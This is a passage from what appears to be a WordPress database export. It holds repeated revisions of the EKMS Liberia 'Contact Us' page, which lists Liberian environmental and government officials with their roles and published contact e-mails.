href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:29:17','2021-01-22 10:29:17','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3390,42,'2021-01-22 10:29:18','2021-01-22 10:29:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\nManager, ESIA\nDepartment of Compliance and Enforcement\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:29:18','2021-01-22 10:29:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3391,42,'2021-01-22 10:29:18','2021-01-22 10:29:18','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:29:18','2021-01-22 10:29:18','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3392,42,'2021-01-22 10:30:09','2021-01-22 10:30:09','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a 